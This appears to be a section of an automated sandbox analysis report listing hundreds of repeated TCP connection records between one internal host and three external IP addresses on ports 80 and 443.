                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 107.172.31.6:80 -> 192.168.2.22:49165
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 104.21.84.67:443 -> 192.168.2.22:49166
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 172.67.215.45:443 -> 192.168.2.22:49167
